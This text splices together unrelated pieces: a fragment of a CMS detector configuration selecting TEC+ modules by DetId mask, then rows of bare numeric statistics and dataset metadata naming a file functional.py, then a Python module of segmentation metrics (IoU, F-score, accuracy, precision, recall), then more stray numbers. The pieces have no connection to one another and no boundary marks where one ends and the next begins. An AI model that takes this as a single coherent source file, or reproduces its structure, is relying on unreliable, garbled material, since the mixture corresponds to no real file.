cms.PSet(detSelection=cms.uint32(5122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a020")), # TEC+ D2 R1 front
cms.PSet(detSelection=cms.uint32(5131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d020")), # TEC+ D3 R1 back
cms.PSet(detSelection=cms.uint32(5132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e020")), # TEC+ D3 R1 front
# cms.PSet(detSelection=cms.uint32(5141),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091020")), # TEC+ D4 R1 back
# cms.PSet(detSelection=cms.uint32(5142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092020")), # TEC+ D4 R1 front
# cms.PSet(detSelection=cms.uint32(5151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095020")), # TEC+ D5 R1 back
# cms.PSet(detSelection=cms.uint32(5152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096020")), # TEC+ D5 R1 front
# cms.PSet(detSelection=cms.uint32(5161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099020")), # TEC+ D6 R1 back
# cms.PSet(detSelection=cms.uint32(5162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a020")), # TEC+ D6 R1 front
# cms.PSet(detSelection=cms.uint32(5171),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d020")), # TEC+ D7 R1 back
# cms.PSet(detSelection=cms.uint32(5172),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e020")), # TEC+ D7 R1 front
# cms.PSet(detSelection=cms.uint32(5181),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1020")), # TEC+ D8 R1 back
# cms.PSet(detSelection=cms.uint32(5182),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2020")), # TEC+ D8 R1 front
# cms.PSet(detSelection=cms.uint32(5191),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5020")), # TEC+ D9 R1 back
# cms.PSet(detSelection=cms.uint32(5192),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6020")), # TEC+ D9 R1 front
cms.PSet(detSelection=cms.uint32(5211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085040")), # TEC+ D1 R2 back
cms.PSet(detSelection=cms.uint32(5212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086040")), # TEC+ D1 R2 front
cms.PSet(detSelection=cms.uint32(5221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089040")), # TEC+ D2 R2 back
cms.PSet(detSelection=cms.uint32(5222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a040")), # TEC+ D2 R2 front
cms.PSet(detSelection=cms.uint32(5231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d040")), # TEC+ D3 R2 back
cms.PSet(detSelection=cms.uint32(5232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e040")), # TEC+ D3 R2 front
cms.PSet(detSelection=cms.uint32(5241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091040")), # TEC+ D4 R2 back
cms.PSet(detSelection=cms.uint32(5242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092040")), # TEC+ D4 R2 front
cms.PSet(detSelection=cms.uint32(5251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095040")), # TEC+ D5 R2 back
cms.PSet(detSelection=cms.uint32(5252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096040")), # TEC+ D5 R2 front
cms.PSet(detSelection=cms.uint32(5261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099040")), # TEC+ D6 R2 back
cms.PSet(detSelection=cms.uint32(5262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a040")), # TEC+ D6 R2 front
# cms.PSet(detSelection=cms.uint32(5271),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d040")), # TEC+ D7 R2 back
# cms.PSet(detSelection=cms.uint32(5272),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e040")), # TEC+ D7 R2 front
# cms.PSet(detSelection=cms.uint32(5281),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1040")), # TEC+ D8 R2 back
# cms.PSet(detSelection=cms.uint32(5282),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2040")), # TEC+ D8 R2 front
# cms.PSet(detSelection=cms.uint32(5291),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5040")), # TEC+ D9 R2 back
# cms.PSet(detSelection=cms.uint32(5292),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6040")), # TEC+ D9 R2 front
cms.PSet(detSelection=cms.uint32(5311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085060")), # TEC+ D1 R3 back
cms.PSet(detSelection=cms.uint32(5312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086060")), # TEC+ D1 R3 front
cms.PSet(detSelection=cms.uint32(5321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089060")), # TEC+ D2 R3 back
cms.PSet(detSelection=cms.uint32(5322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a060")), # TEC+ D2 R3 front
cms.PSet(detSelection=cms.uint32(5331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d060")), # TEC+ D3 R3 back
cms.PSet(detSelection=cms.uint32(5332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e060")), # TEC+ D3 R3 front
cms.PSet(detSelection=cms.uint32(5341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091060")), # TEC+ D4 R3 back
cms.PSet(detSelection=cms.uint32(5342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092060")), # TEC+ D4 R3 front
cms.PSet(detSelection=cms.uint32(5351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095060")), # TEC+ D5 R3 back
cms.PSet(detSelection=cms.uint32(5352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096060")), # TEC+ D5 R3 front
cms.PSet(detSelection=cms.uint32(5361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099060")), # TEC+ D6 R3 back
cms.PSet(detSelection=cms.uint32(5362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a060")), # TEC+ D6 R3 front
cms.PSet(detSelection=cms.uint32(5371),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d060")), # TEC+ D7 R3 back
cms.PSet(detSelection=cms.uint32(5372),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e060")), # TEC+ D7 R3 front
cms.PSet(detSelection=cms.uint32(5381),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1060")), # TEC+ D8 R3 back
cms.PSet(detSelection=cms.uint32(5382),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2060")), # TEC+ D8 R3 front
# cms.PSet(detSelection=cms.uint32(5391),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5060")), # TEC+ D9 R3 back
# cms.PSet(detSelection=cms.uint32(5392),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6060")), # TEC+ D9 R3 front
cms.PSet(detSelection=cms.uint32(5411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c085080")), # TEC+ D1 R4 back
cms.PSet(detSelection=cms.uint32(5412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c086080")), # TEC+ D1 R4 front
cms.PSet(detSelection=cms.uint32(5421),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c089080")), # TEC+ D2 R4 back
cms.PSet(detSelection=cms.uint32(5422),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a080")), # TEC+ D2 R4 front
cms.PSet(detSelection=cms.uint32(5431),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d080")), # TEC+ D3 R4 back
cms.PSet(detSelection=cms.uint32(5432),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e080")), # TEC+ D3 R4 front
cms.PSet(detSelection=cms.uint32(5441),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c091080")), # TEC+ D4 R4 back
cms.PSet(detSelection=cms.uint32(5442),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c092080")), # TEC+ D4 R4 front
cms.PSet(detSelection=cms.uint32(5451),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c095080")), # TEC+ D5 R4 back
cms.PSet(detSelection=cms.uint32(5452),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c096080")), # TEC+ D5 R4 front
cms.PSet(detSelection=cms.uint32(5461),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c099080")), # TEC+ D6 R4 back
cms.PSet(detSelection=cms.uint32(5462),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a080")), # TEC+ D6 R4 front
cms.PSet(detSelection=cms.uint32(5471),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d080")), # TEC+ D7 R4 back
cms.PSet(detSelection=cms.uint32(5472),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e080")), # TEC+ D7 R4 front
cms.PSet(detSelection=cms.uint32(5481),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a1080")), # TEC+ D8 R4 back
cms.PSet(detSelection=cms.uint32(5482),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a2080")), # TEC+ D8 R4 front
cms.PSet(detSelection=cms.uint32(5491),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a5080")), # TEC+ D9 R4 back
cms.PSet(detSelection=cms.uint32(5492),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a6080")), # TEC+ D9 R4 front
cms.PSet(detSelection=cms.uint32(5511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850a0")), # TEC+ D1 R5 back
cms.PSet(detSelection=cms.uint32(5512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860a0")), # TEC+ D1 R5 front
cms.PSet(detSelection=cms.uint32(5521),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890a0")), # TEC+ D2 R5 back
cms.PSet(detSelection=cms.uint32(5522),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0a0")), # TEC+ D2 R5 front
cms.PSet(detSelection=cms.uint32(5531),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0a0")), # TEC+ D3 R5 back
cms.PSet(detSelection=cms.uint32(5532),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0a0")), # TEC+ D3 R5 front
cms.PSet(detSelection=cms.uint32(5541),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910a0")), # TEC+ D4 R5 back
cms.PSet(detSelection=cms.uint32(5542),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920a0")), # TEC+ D4 R5 front
cms.PSet(detSelection=cms.uint32(5551),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950a0")), # TEC+ D5 R5 back
cms.PSet(detSelection=cms.uint32(5552),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960a0")), # TEC+ D5 R5 front
cms.PSet(detSelection=cms.uint32(5561),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990a0")), # TEC+ D6 R5 back
cms.PSet(detSelection=cms.uint32(5562),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0a0")), # TEC+ D6 R5 front
cms.PSet(detSelection=cms.uint32(5571),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0a0")), # TEC+ D7 R5 back
cms.PSet(detSelection=cms.uint32(5572),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0a0")), # TEC+ D7 R5 front
cms.PSet(detSelection=cms.uint32(5581),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10a0")), # TEC+ D8 R5 back
cms.PSet(detSelection=cms.uint32(5582),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20a0")), # TEC+ D8 R5 front
cms.PSet(detSelection=cms.uint32(5591),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50a0")), # TEC+ D9 R5 back
cms.PSet(detSelection=cms.uint32(5592),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60a0")), # TEC+ D9 R5 front
cms.PSet(detSelection=cms.uint32(5611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850c0")), # TEC+ D1 R6 back
cms.PSet(detSelection=cms.uint32(5612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860c0")), # TEC+ D1 R6 front
cms.PSet(detSelection=cms.uint32(5621),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890c0")), # TEC+ D2 R6 back
cms.PSet(detSelection=cms.uint32(5622),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0c0")), # TEC+ D2 R6 front
cms.PSet(detSelection=cms.uint32(5631),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0c0")), # TEC+ D3 R6 back
cms.PSet(detSelection=cms.uint32(5632),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0c0")), # TEC+ D3 R6 front
cms.PSet(detSelection=cms.uint32(5641),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910c0")), # TEC+ D4 R6 back
cms.PSet(detSelection=cms.uint32(5642),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920c0")), # TEC+ D4 R6 front
cms.PSet(detSelection=cms.uint32(5651),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950c0")), # TEC+ D5 R6 back
cms.PSet(detSelection=cms.uint32(5652),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960c0")), # TEC+ D5 R6 front
cms.PSet(detSelection=cms.uint32(5661),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990c0")), # TEC+ D6 R6 back
cms.PSet(detSelection=cms.uint32(5662),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0c0")), # TEC+ D6 R6 front
cms.PSet(detSelection=cms.uint32(5671),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0c0")), # TEC+ D7 R6 back
cms.PSet(detSelection=cms.uint32(5672),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0c0")), # TEC+ D7 R6 front
cms.PSet(detSelection=cms.uint32(5681),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10c0")), # TEC+ D8 R6 back
cms.PSet(detSelection=cms.uint32(5682),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20c0")), # TEC+ D8 R6 front
cms.PSet(detSelection=cms.uint32(5691),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50c0")), # TEC+ D9 R6 back
cms.PSet(detSelection=cms.uint32(5692),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60c0")), # TEC+ D9 R6 front
cms.PSet(detSelection=cms.uint32(5711),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0850e0")), # TEC+ D1 R7 back
cms.PSet(detSelection=cms.uint32(5712),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0860e0")), # TEC+ D1 R7 front
cms.PSet(detSelection=cms.uint32(5721),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0890e0")), # TEC+ D2 R7 back
cms.PSet(detSelection=cms.uint32(5722),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08a0e0")), # TEC+ D2 R7 front
cms.PSet(detSelection=cms.uint32(5731),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08d0e0")), # TEC+ D3 R7 back
cms.PSet(detSelection=cms.uint32(5732),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c08e0e0")), # TEC+ D3 R7 front
cms.PSet(detSelection=cms.uint32(5741),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0910e0")), # TEC+ D4 R7 back
cms.PSet(detSelection=cms.uint32(5742),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0920e0")), # TEC+ D4 R7 front
cms.PSet(detSelection=cms.uint32(5751),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0950e0")), # TEC+ D5 R7 back
cms.PSet(detSelection=cms.uint32(5752),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0960e0")), # TEC+ D5 R7 front
cms.PSet(detSelection=cms.uint32(5761),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0990e0")), # TEC+ D6 R7 back
cms.PSet(detSelection=cms.uint32(5762),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09a0e0")), # TEC+ D6 R7 front
cms.PSet(detSelection=cms.uint32(5771),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09d0e0")), # TEC+ D7 R7 back
cms.PSet(detSelection=cms.uint32(5772),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c09e0e0")), # TEC+ D7 R7 front
cms.PSet(detSelection=cms.uint32(5781),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a10e0")), # TEC+ D8 R7 back
cms.PSet(detSelection=cms.uint32(5782),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a20e0")), # TEC+ D8 R7 front
cms.PSet(detSelection=cms.uint32(5791),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a50e0")), # TEC+ D9 R7 back
cms.PSet(detSelection=cms.uint32(5792),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c0a60e0")) # TEC+ D9 R7 front
)
)
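# Note on the selection strings above: each "0xMASK-0xVALUE" entry encodes a mask/value
# test on the raw 32-bit DetId, i.e. a module is selected when
# (rawDetId & 0x1e0ff0e0) == 0xVALUE, so a single comparison pins the subdetector (TEC),
# side, disk, ring and front/back bits at once.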
| 138.300195
| 154
| 0.739598
| 9,196
| 70,948
| 5.706068
| 0.107656
| 0.062165
| 0.168734
| 0.195377
| 0.874678
| 0.874678
| 0.874107
| 0.852343
| 0.805652
| 0.016713
| 0
| 0.148745
| 0.089657
| 70,948
| 512
| 155
| 138.570313
| 0.663694
| 0.181386
| 0
| 0.009281
| 0
| 0
| 0.190595
| 0.153942
| 0
| 0
| 0.146612
| 0
| 0
| 1
| 0
| false
| 0
| 0.00232
| 0
| 0.00232
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4f5d9ca3294c943db1622231a1679bba90eb7a9
| 6,089
|
py
|
Python
|
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
scripts_segtool/functional.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import torch
def _take_channels(*xs, ignore_channels=None):
if ignore_channels is None:
return xs
else:
channels = [channel for channel in range(xs[0].shape[1]) if channel not in ignore_channels]
xs = [torch.index_select(x, dim=1, index=torch.tensor(channels).to(x.device)) for x in xs]
return xs
def _threshold(x, threshold=None):
if threshold is not None:
return (x > threshold).type(x.dtype)
else:
return x
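# A quick illustration of the two helpers on a hypothetical tensor: _threshold binarizes
# soft scores and _take_channels drops ignored class channels, e.g.
#   x = torch.rand(2, 3, 4, 4)
#   _threshold(x, 0.5)                               # 0/1 mask, same shape
#   _take_channels(x, ignore_channels=[0])[0].shape  # torch.Size([2, 2, 4, 4])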
def iou(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate Intersection over Union between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
eps (float): epsilon to avoid zero division
        threshold (float, optional): threshold for output binarization
        ignore_channels (list, optional): channels excluded from the score
        num_classes (int, optional): if set, return a per-class list instead of the mean
    Returns:
        float or list: IoU (Jaccard) score, per class when num_classes is given
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
    if num_classes is None:
        ious = []
        for prs, gts in zip(pr, gt):        # iterate over the batch dimension
            for p, g in zip(prs, gts):      # iterate over class channels
                intersection = torch.sum(g * p)
                union = torch.sum(g) + torch.sum(p) - intersection
                iou_score = intersection / (union + eps)
                ious.append(iou_score)
        return sum(ious) / len(ious)
    else:
        ious = [0.0] * num_classes
        batch_size = len(pr)
        for prs, gts in zip(pr, gt):
            for i, p, g in zip(range(num_classes), prs, gts):
                intersection = torch.sum(g * p)
                union = torch.sum(g) + torch.sum(p) - intersection
                iou_score = intersection / (union + eps)
                ious[i] += iou_score / batch_size
        return ious
jaccard = iou
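# Usage sketch (hypothetical shapes; masks are assumed one-hot [batch, class, H, W]):
#   iou(pr, gt, threshold=0.5)                 # scalar: mean over batch and classes
#   iou(pr, gt, threshold=0.5, num_classes=3)  # list: one batch-averaged score per class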
def f_score(pr, gt, beta=1, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate F-score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
        beta (float): positive constant weighting recall relative to precision
        eps (float): epsilon to avoid zero division
        threshold (float, optional): threshold for output binarization
        ignore_channels (list, optional): channels excluded from the score
        num_classes (int, optional): if set, return a per-class list instead of the mean
    Returns:
        float or list: F-beta score (the Dice/F1 score when beta=1)
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
    if num_classes is None:
        scores = []
        for prs, gts in zip(pr, gt):        # iterate over the batch dimension
            for p, g in zip(prs, gts):      # iterate over class channels
                tp = torch.sum(g * p)
                fp = torch.sum(p) - tp
                fn = torch.sum(g) - tp
                score = (1 + beta ** 2) * tp / ((1 + beta ** 2) * tp + beta ** 2 * fn + fp + eps)
                scores.append(score)
        return sum(scores) / len(scores)
    else:
        scores = [0.0] * num_classes
        batch_size = len(pr)
        for prs, gts in zip(pr, gt):
            for i, p, g in zip(range(num_classes), prs, gts):
                tp = torch.sum(g * p)
                fp = torch.sum(p) - tp
                fn = torch.sum(g) - tp
                score = (1 + beta ** 2) * tp / ((1 + beta ** 2) * tp + beta ** 2 * fn + fp + eps)
                scores[i] += score / batch_size
        return scores
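# With beta=1 the formula reduces to the Dice coefficient 2*tp / (2*tp + fp + fn),
# so f_score(pr, gt) is the usual F1/Dice score; beta > 1 weights recall more heavily.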
def accuracy(pr, gt, threshold=0.5, ignore_channels=None):
"""Calculate accuracy score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
        threshold (float): threshold for output binarization (default 0.5)
        ignore_channels (list, optional): channels excluded from the score
    Returns:
        float: accuracy score
"""
pr = _threshold(pr, threshold=threshold)
pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
tp = torch.sum(gt == pr, dtype=pr.dtype)
score = tp / gt.view(-1).shape[0]
return score
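# Note: accuracy counts element-wise matches across all channels, so for one-hot
# multi-class masks it is pixel accuracy averaged over every class plane.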
def precision(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate precision score between ground truth and prediction
Args:
pr (torch.Tensor): predicted tensor
gt (torch.Tensor): ground truth tensor
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: precision score
"""
    pr = _threshold(pr, threshold=threshold)
    pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
    if num_classes is None:
        scores = []
        for prs, gts in zip(pr, gt):
            for p, g in zip(prs, gts):
                tp = torch.sum(g * p)
                fp = torch.sum(p) - tp
                score = tp / (tp + fp + eps)
                scores.append(score)
        return sum(scores) / len(scores)
    else:
        scores = [0.0] * num_classes
        batch_size = len(pr)
        for prs, gts in zip(pr, gt):
            for i, p, g in zip(range(num_classes), prs, gts):
                tp = torch.sum(g * p)
                fp = torch.sum(p) - tp
                score = tp / (tp + fp + eps)
                scores[i] += score / batch_size
        return scores
def recall(pr, gt, eps=1e-7, threshold=None, ignore_channels=None, num_classes=None):
"""Calculate Recall between ground truth and prediction
Args:
pr (torch.Tensor): A list of predicted elements
gt (torch.Tensor): A list of elements that are to be predicted
eps (float): epsilon to avoid zero division
threshold: threshold for outputs binarization
Returns:
float: recall score
"""
    pr = _threshold(pr, threshold=threshold)
    pr, gt = _take_channels(pr, gt, ignore_channels=ignore_channels)
    if num_classes is None:
        scores = []
        for prs, gts in zip(pr, gt):
            for p, g in zip(prs, gts):
                tp = torch.sum(g * p)
                fn = torch.sum(g) - tp
                score = tp / (tp + fn + eps)
                scores.append(score)
        return sum(scores) / len(scores)
    else:
        scores = [0.0] * num_classes
        batch_size = len(pr)
        for prs, gts in zip(pr, gt):
            for i, p, g in zip(range(num_classes), prs, gts):
                tp = torch.sum(g * p)
                fn = torch.sum(g) - tp
                score = tp / (tp + fn + eps)
                scores[i] += score / batch_size
        return scores
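# A minimal, self-contained smoke test with random tensors (illustrative values only):
if __name__ == "__main__":
    torch.manual_seed(0)
    gt = (torch.rand(2, 3, 8, 8) > 0.5).float()  # fake binary ground-truth masks
    pr = torch.rand(2, 3, 8, 8)                  # fake soft predictions
    print("mean IoU :", iou(pr, gt, threshold=0.5))
    print("per-class:", iou(pr, gt, threshold=0.5, num_classes=3))
    print("F1 score :", f_score(pr, gt, threshold=0.5))
    print("accuracy :", accuracy(pr, gt))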
| 36.461078
| 99
| 0.561176
| 793
| 6,089
| 4.238335
| 0.113493
| 0.032133
| 0.04463
| 0.032133
| 0.804522
| 0.792919
| 0.792919
| 0.792919
| 0.784885
| 0.752752
| 0
| 0.006399
| 0.332731
| 6,089
| 167
| 100
| 36.461078
| 0.820822
| 0.243718
| 0
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
